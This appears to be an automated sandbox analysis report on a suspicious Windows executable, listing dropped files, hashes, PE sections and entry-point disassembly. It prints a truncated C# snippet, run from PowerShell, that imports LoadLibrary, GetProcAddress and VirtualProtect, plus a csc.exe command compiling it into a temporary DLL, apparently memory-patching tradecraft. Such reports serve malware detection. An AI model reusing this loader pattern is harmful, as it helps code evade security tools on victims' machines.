File Type: XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category: dropped
Size (bytes): 8410
Entropy (8bit): 3.699792930887906
Encrypted: false
SSDEEP: 192:R6l79RJNO6Rre6YwbSU9LDgmfi7Alpr089bSOuFsfNGm:R6lXJk6U6Y8SU9vgmfi7AZSOuef1
MD5: 41B9A9077B199F04C2CEC31BB7B35B67
SHA1: FB8B8C7355D6469652696D76A3E48C4CB7084EBE
SHA-256: 6E449E90F8F55D3D15090E4D38667C26617E113CF618170E25C0AAB6D4F535CE
SHA-512: 359D60F439F7B9990AE5A59A5DD151EC071B7E4E8E2E5E8A66F4B67014D7882075E409804C424D2FA594E2454203E0854B510616EA78CA7B7ED637B0F88E2951
Malicious: false
Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...3.4.4.8...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.3.4.4.8.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.6.7.6.<./.P.i.

Process: C:\Windows\SysWOW64\WerFault.exe
File Type: XML 1.0 document, ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 4723
Entropy (8bit): 4.48953873450756
Encrypted: false
SSDEEP: 48:cvIwr7SGl8zsTJgkZ7aI9XkWpW8VYXPYm8M4JqOsFEZRV+q8vPO2hNfd:uIafth7197VLJzVKZhNfd
MD5: E6DCD5BACE01BDC5C548AF55C1BABA60
SHA1: 165CC33CD343E09EF6985A650B8B2F7A4E3C5871
SHA-256: 322C69BF4CB756B7364F579C99F062EEC5701B6C11868C43C2E6449DC6D3C146
SHA-512: E3EE78797757F8D65AFF28F37BEB1CFF0F37BD4591862C70B722AC992868E8F9E138E9C7B58894F948EF7F3DC24A8E186C35BF68A412BC2602DE6C39DEBC7724
Malicious: false
Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="3448" />.. <arg nm="verqfe" val="3448" />.. <arg nm="csdbld" val="3448" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="222888406" />.. <arg nm="osinsty" val="2" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="

Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: dropped
Size (bytes): 11608
Entropy (8bit): 4.890472898059848
Encrypted: false
SSDEEP: 192:x9smG3YrKkj9dcU6C7Vsm5emlV9smbib4xYTVsm5emdqxoeRgp51ib47VFn3eGOq:lF/ib4xYT33ib47VoGIpN6KQkj2gikjm
MD5: 6608B9ECBDD36DEA311D11883E5888C7
SHA1: A3787DEEAFEB575AE2CCD6F0FB71E0FBA1069B28
SHA-256: B1FC6F92D3360FD6416226BA40D224A14FE11396D7127399FDB3097450255E36
SHA-512: DECCE44C46CF29072E0CE1801AEA53F23617FE74A0395AE285DFB600CE542985350EFE5B3ACC19FE3B26904BB85374437675A567BFCA95651DEB7437A81E910E
Malicious: false
Preview: PSMODULECACHE......&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psm1........SafeGetCommand........Get-ScriptBlockScope....$...Get-DictionaryValueFromFirstKeyFound........New-PesterOption........Invoke-Pester........ResolveTestScripts........Set-ScriptBlockScope........-Z..z..a...C:\Program Files (x86)\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\PackageManagement.psd1........Unregister-PackageSource........Save-Package........Install-PackageProvider........Find-PackageProvider........Install-Package........Get-PackageProvider........Get-Package........Uninstall-Package........Set-PackageSource........Get-PackageSource........Find-Package........Register-PackageSource........Import-PackageProvider........p...z..[...C:\Program Files\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\PackageManagement.psd1........Set-PackageSource........Unregister-PackageSource........Get-PackageSource........Install-Package........Save-Package........Get-Package...

Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: dropped
Size (bytes): 11436
Entropy (8bit): 5.443043860337226
Encrypted: false
SSDEEP: 192:hndjsPwvGXjZh12XtGnjw9ya3RYSMjc2fPUOX9JP4li5CtkElwqR8C2OXQ91z9Uj:hdjsPwvGzwgj6H38AKP4gakElx2+Q9gj
MD5: 4B84393ED22FEB212728518EBCF74EB9
SHA1: 7A0AFE4532A5653A800FB44BB8E8BFF0FA00CE5C
SHA-256: 1B35FA333905C74501AEF520578FB5F2AC5D45ABF95EA1640CD8AEEE25EF9A5D
SHA-512: C9D129C9D345400A38545BA614A49B5E0455835EF737B5DDD0AFB9C32641D44DCEEF386BE706409B780583F2A28407A6744331D470D8620012B2AB23DB576E94
Malicious: false
Preview: @...e...........B....................................@..........H...............o..b~.D.poM...!..... .Microsoft.PowerShell.ConsoleHostD...............E...y.BG.\..............System.Management.Automation0.................Vn.F..kLsw..........System..4...............<."..Ke@...j..........System.Core.4.................%...K... ...f.......System.Xml..L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.@................z.U..G...5.f.1........System.DirectoryServices<................t.,.lG....M...........System.Management...4...............&.QiA0aN.:... .G........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<................$@...J....M+.B........System.Transactions.............................................V.@..?@...@.X.@.J.@.Z.@.^.@.qT@.kT@..T@..S@.......@.].@.\.@...@...@...@...@...@...@.=.@.?.@...@...@.

Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
File Type: Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols, created Tue Oct 15 15:03:39 2024, 1st section name ".debug$S"
Category: dropped
Size (bytes): 1328
Entropy (8bit): 3.9865224133287556
Encrypted: false
SSDEEP: 24:Hoe9E2gOX8XhHIwKE2mfII+ycuZhNXakSJPNnqSqd:UOX8x3K1mg1ulXa3rqSK
MD5: 5FEBC21DB9A5D6133E8C0A9EBC8EDA78
SHA1: D992F9E109178D68D1B52981828F3F40D8AC0C2E
SHA-256: 11DC58A8CA1CE3E20F48A0D325A965F3C864009EC860ABDD5623D1662FB3124B
SHA-512: D83B835E29B3A7E6090AD03765C6661F2F93EF6E74733A76CA13DEB133A2D9F9A826E8EF45A33606E80B6E510592853F72A69E46E30DA606AB26AAB00609D2C3
Malicious: false
Preview: L...K..g.............debug$S........L...................@..B.rsrc$01........X.......0...........@..@.rsrc$02........P...:...............@..@........T....c:\Users\user\AppData\Local\Temp\ztufso2n\CSC92EFC5D82192472686D16339634A9CDA.TMP...................\2t*..6.z..h..........4.......C:\Users\user\AppData\Local\Temp\RESBF7B.tmp.-.<....................a..Microsoft (R) CVTRES.\.=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe...............................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...z.t.u.f.s.o.2.n...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.

Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 60
Entropy (8bit): 4.038920595031593
Encrypted: false
SSDEEP: 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA1: 6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512: 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious: false
Preview: # PowerShell test file to determine AppLocker lockdown mode
                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                File Type:MSVC .res
                                                                                                Category:dropped
                                                                                                Size (bytes):652
                                                                                                Entropy (8bit):3.095901299784415
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryuqak7YnqqFbPN5Dlq5J:+RI+ycuZhNXakSJPNnqX
                                                                                                MD5:B91993B05C32742A04B436807A8F9568
                                                                                                SHA1:1C90F767526FD804439E3514054E4DCA251C1F1E
                                                                                                SHA-256:7F87B674D5A79C3A32B569647A496B65404E7BD3471A8D0F6F0E3268BBE8F098
                                                                                                SHA-512:AF0F2D7D441B5A8BB3182EA10FAD8709A07072E8426192FCFA14A27DCE748A94AE0365226BF4E14C4D44E9F278E8B41E68FA175D13CABDEB638A0C9B8AC3F079
                                                                                                Malicious:false
                                                                                                Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...z.t.u.f.s.o.2.n...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...z.t.u.f.s.o.2.n...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:Unicode text, UTF-8 (with BOM) text
                                                                                                Category:dropped
                                                                                                Size (bytes):1140
                                                                                                Entropy (8bit):4.751587839856729
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:JjajwGHNw7+qFhL/+PS+oXG4mnF1D7ZTHtws4bx:JjaEGHNw7+Ib+6+oXZIF17Zrtws4bx
                                                                                                MD5:FE35992F552A2057291C867108A5C2EB
                                                                                                SHA1:3359CC35D11E68B353BBF06D03F1A9937E2689EE
                                                                                                SHA-256:C6CD29B3B2981C29538DEB9B4445A10EC4993E93F058621F49E6AE294B4B6D1F
                                                                                                SHA-512:8E639DB3A4696FFD380C495CF816B2571656D51AEA0B3DA75FBFC7151F1DE704FE1508FF61C95FC2AC2EF230FD6FEE48536C074D71F025675103B737128E9DFF
                                                                                                Malicious:false
                                                                                                Preview:.using System;.using System.Runtime.InteropServices;..public class MyUtilityClass {. // Renamed class for clarity.. // Additional variables. private const string Kernel32Library = "kernel32";. . // Function declarations. [DllImport(Kernel32Library)]. public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);.. [DllImport(Kernel32Library)]. public static extern IntPtr LoadLibrary(string name);.. [DllImport(Kernel32Library)]. public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect);.. // Additional method for clarity. public static IntPtr LoadLibraryAndGetProcAddress(string libraryName, string procName) {. IntPtr hModule = LoadLibrary(libraryName);. if (hModule == IntPtr.Zero) {. throw new Exception("Failed to load library: " + libraryName);. }.. IntPtr procAddress = GetProcAddress(hModule, procName);. if (procAddress == In
                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (366), with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):369
                                                                                                Entropy (8bit):5.2320134523931925
                                                                                                Encrypted:false
                                                                                                SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2WXp+N23fwNXNiX/Gzxs7+AEszIWXp+N23fwC:p37Lvkmb6KHOXgX/GWZE8OXgX/b
                                                                                                MD5:B082657B0246E9F5E257146A9B4FF58D
                                                                                                SHA1:B86B43A54C0112D06D14649F9D7541AB38389F22
                                                                                                SHA-256:C1FBAAEE68645A5B286AD35275D13EB65D3A7D9F58E76DD34E0E43FC3D770F95
                                                                                                SHA-512:9B8F311791830A5DE8EDE940A8E1A6C8116AA0585CC38D30E2793A0A4456756D57270D57AE4B96736D7DDB0D3932D483A9A27E7F0C290B2B7E0F3EF01FA0E508
                                                                                                Malicious:true
                                                                                                Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\ztufso2n\ztufso2n.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\ztufso2n\ztufso2n.0.cs"
                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):4096
                                                                                                Entropy (8bit):2.981432505280615
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:6lpLNvhfeRPBFLz/kKKhSJbxsUCXumwYvV1ulXa3rq:WJhfeR5dz/dxdsGlK
                                                                                                MD5:1DC4A27F1BB46A455ACAE56CBFF8118C
                                                                                                SHA1:4DDD8FB2D1E0440603B9B4649EECA98CE1F08913
                                                                                                SHA-256:857F3EADBD39BD1E1306BD70033688CFF7B0B0DECB2F8A234EDDD9B1E9F6DF4F
                                                                                                SHA-512:D3E578A6B06266776E50D5ABCDFBBC94DBB444E0ABD61DCF3867FFAA72D0AB9FECB827FCBDD83998B05988ED6A42833F08C6DE1A31D3C30576E513DC33E9A3E8
                                                                                                Malicious:false
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...K..g...........!.................%... ...@....... ....................................@..................................%..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................%......H........ ...............................................................0..M........(......~....(....,.r...p.(....s....z..(......~....(....,.r3..p.(....s....z.*..(....*...BSJB............v4.0.30319......l.......#~..$.......#Strings........x...#US.d.......#GUID...t.......#Blob...........W.........%3........................................................................6./.........5.....U.....|......./...../...../.............................Q.=.......... M............ \.$...
                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (446), with CRLF, CR line terminators
                                                                                                Category:modified
                                                                                                Size (bytes):867
                                                                                                Entropy (8bit):5.307515624971589
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:KBqd3ka6KHOXgX/XE8OXgX/aKax5DqBVKVrdFAMBJTH:Uika6AOXgX/XE8OXgX/aK2DcVKdBJj
                                                                                                MD5:6140CC2078B8B89F7A07BE1C69B92412
                                                                                                SHA1:C327654AB2BAF45F6D4407E444827090C7D1653D
                                                                                                SHA-256:D3D6DCF4080118A13D2DAAFC1E7CC40150EEDB563C5146C82AFAFEDCA0942FA5
                                                                                                SHA-512:C119D8B90CE958EC2AE589FB36030B80A9B55B6FB698E11F99F3C83627525B2F0D4D90E9FC37C10D71BF76B887E84C89F4A392CB86877F9ED2F3590865444C99
                                                                                                Malicious:false
                                                                                                Preview:.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\ztufso2n\ztufso2n.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\ztufso2n\ztufso2n.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                File Type:MS Windows registry file, NT/2000 or above
                                                                                                Category:dropped
                                                                                                Size (bytes):1835008
                                                                                                Entropy (8bit):4.327173313518775
                                                                                                Encrypted:false
                                                                                                SSDEEP:6144:1RJufhX4RxLT+yHH4A0WBIIQfTa765q/E5ySvL+ML61YhcRo5d5OWiBeRp:3J33BIdBvL+SLcIdYFkp
                                                                                                MD5:615718E393B55AE46400BDC27334331B
                                                                                                SHA1:127861CD7AF8B31D307476845BB876FD1E7EF699
                                                                                                SHA-256:0BCACFBD3DA38DA28A39421DC5BC09EABEA071DFEB0DF36CD0D8934C5E3109F9
                                                                                                SHA-512:80A36BCEEB3C1CD0813E1588D47020175BF28EA1EBE3EDB8ACCBA4E830B2EBD0107C6FD8C7E1D7010722F515CF6BF2394314299FC64611C0523748BFCC9542C0
                                                                                                Malicious:false
                                                                                                Preview:regfO...O....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtmv....................................................................................................................................................................................................................................................................................................................................................5..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
File type: PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit): 6.47551582330274
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: Lm9IJ4r9oO.exe
File size: 199'168 bytes
MD5: 032bc4fb50a2d4fc55727d99248b29b2
SHA1: c517bf569347599fe848c3fc9381f6daf3f9ec71
SHA256: 23ce79edb738b3e6dfad9f4dff2ff1800c8f3ccd3b3e809d4dd95c8b3ecfe5dc
SHA512: 15efa474c507630647f80a9475a32b7e5a5d32c74b1e512c5a7adc1a5ab361a14f981ed738448c28cd6b98d68806c35c7995066a535d8ae756fe616379df3f54
SSDEEP: 6144:fuSgACIp4rAaEHcgjE0iDIgycaA1i5yMoz:fr4rAaE8gvxA1igMoz
TLSH: 3B146C11B5C08032D5B315310AF4DBBA9A3EB9714FA669CFA7941F7F8F302C1A63195A
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......44\GpU2.pU2.pU2.;-1.{U2.;-7..U2.;-6.eU2.v.6.bU2.v.1.eU2.v.7.=U2.;-3.wU2.pU3..U2...;.qU2.....qU2...0.qU2.RichpU2................
Icon Hash: 90cececece8e8eb0
Entrypoint: 0x40853c
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp: 0x66C7E48C [Fri Aug 23 01:23:24 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 6
OS Version Minor: 0
File Version Major: 6
File Version Minor: 0
Subsystem Version Major: 6
Subsystem Version Minor: 0
Import Hash: 3e85697c6fd69fc95de9b2eb31ec533f
                                                                                                Instruction
                                                                                                call 00007F2D7D04447Bh
                                                                                                jmp 00007F2D7D043ADFh
                                                                                                push ebp
                                                                                                mov ebp, esp
                                                                                                mov eax, dword ptr [ebp+08h]
                                                                                                push esi
                                                                                                mov ecx, dword ptr [eax+3Ch]
                                                                                                add ecx, eax
                                                                                                movzx eax, word ptr [ecx+14h]
                                                                                                lea edx, dword ptr [ecx+18h]
                                                                                                add edx, eax
                                                                                                movzx eax, word ptr [ecx+06h]
                                                                                                imul esi, eax, 28h
                                                                                                add esi, edx
                                                                                                cmp edx, esi
                                                                                                je 00007F2D7D043C7Bh
                                                                                                mov ecx, dword ptr [ebp+0Ch]
                                                                                                cmp ecx, dword ptr [edx+0Ch]
                                                                                                jc 00007F2D7D043C6Ch
                                                                                                mov eax, dword ptr [edx+08h]
                                                                                                add eax, dword ptr [edx+0Ch]
                                                                                                cmp ecx, eax
                                                                                                jc 00007F2D7D043C6Eh
                                                                                                add edx, 28h
                                                                                                cmp edx, esi
                                                                                                jne 00007F2D7D043C4Ch
                                                                                                xor eax, eax
                                                                                                pop esi
                                                                                                pop ebp
                                                                                                ret
                                                                                                mov eax, edx
                                                                                                jmp 00007F2D7D043C5Bh
                                                                                                push esi
                                                                                                call 00007F2D7D04477Ah
                                                                                                test eax, eax
                                                                                                je 00007F2D7D043C82h
                                                                                                mov eax, dword ptr fs:[00000018h]
                                                                                                mov esi, 00430224h
                                                                                                mov edx, dword ptr [eax+04h]
                                                                                                jmp 00007F2D7D043C66h
                                                                                                cmp edx, eax
                                                                                                je 00007F2D7D043C72h
                                                                                                xor eax, eax
                                                                                                mov ecx, edx
                                                                                                lock cmpxchg dword ptr [esi], ecx
                                                                                                test eax, eax
                                                                                                jne 00007F2D7D043C52h
                                                                                                xor al, al
                                                                                                pop esi
                                                                                                ret
                                                                                                mov al, 01h
                                                                                                pop esi
                                                                                                ret
                                                                                                push ebp
                                                                                                mov ebp, esp
                                                                                                cmp dword ptr [ebp+08h], 00000000h
                                                                                                jne 00007F2D7D043C69h
                                                                                                mov byte ptr [00430228h], 00000001h
                                                                                                call 00007F2D7D043F20h
                                                                                                call 00007F2D7D046D0Dh
                                                                                                test al, al
                                                                                                jne 00007F2D7D043C66h
                                                                                                xor al, al
                                                                                                pop ebp
                                                                                                ret
                                                                                                call 00007F2D7D04F5E9h
                                                                                                test al, al
                                                                                                jne 00007F2D7D043C6Ch
                                                                                                push 00000000h
                                                                                                call 00007F2D7D046D14h
                                                                                                pop ecx
                                                                                                jmp 00007F2D7D043C4Bh
                                                                                                mov al, 01h
                                                                                                pop ebp
                                                                                                ret
                                                                                                push ebp
                                                                                                mov ebp, esp
                                                                                                cmp byte ptr [00430229h], 00000000h
                                                                                                je 00007F2D7D043C66h
                                                                                                mov al, 01h
Data directories

Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x2e030 | 0x50 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x31000 | 0x1e0 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x32000 | 0x1c04 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x2bda0 | 0x70 | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x2bce0 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x24000 | 0x158 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Sections

Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x22c06 | 0x22e00 | 1e7ae8beadcdaa526a94f093e328e4ee | False | 0.5663922491039427 | data | 6.6099261098449125 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x24000 | 0xa7ee | 0xa800 | b64ff58716f526d5bf0a7dcff319f4e0 | False | 0.43884858630952384 | data | 4.981244710793286 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x2f000 | 0x1d58 | 0x1000 | 7f3d3ebd34c5f43091a6557e2f762199 | False | 0.19482421875 | DOS executable (block device driver \377\377\377\377,32-bit sector-support) | 3.0558852191755506 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x31000 | 0x1e0 | 0x200 | ad7b78e84f1d02fc883315380c423021 | False | 0.529296875 | data | 4.7176788329467545 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x32000 | 0x1c04 | 0x1e00 | 16ce41d4f042a647a389b0421163eb29 | False | 0.7002604166666667 | data | 6.34754632370132 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Resources

Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_MANIFEST | 0x31060 | 0x17d | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States | 0.5931758530183727
Imports

DLL | Import
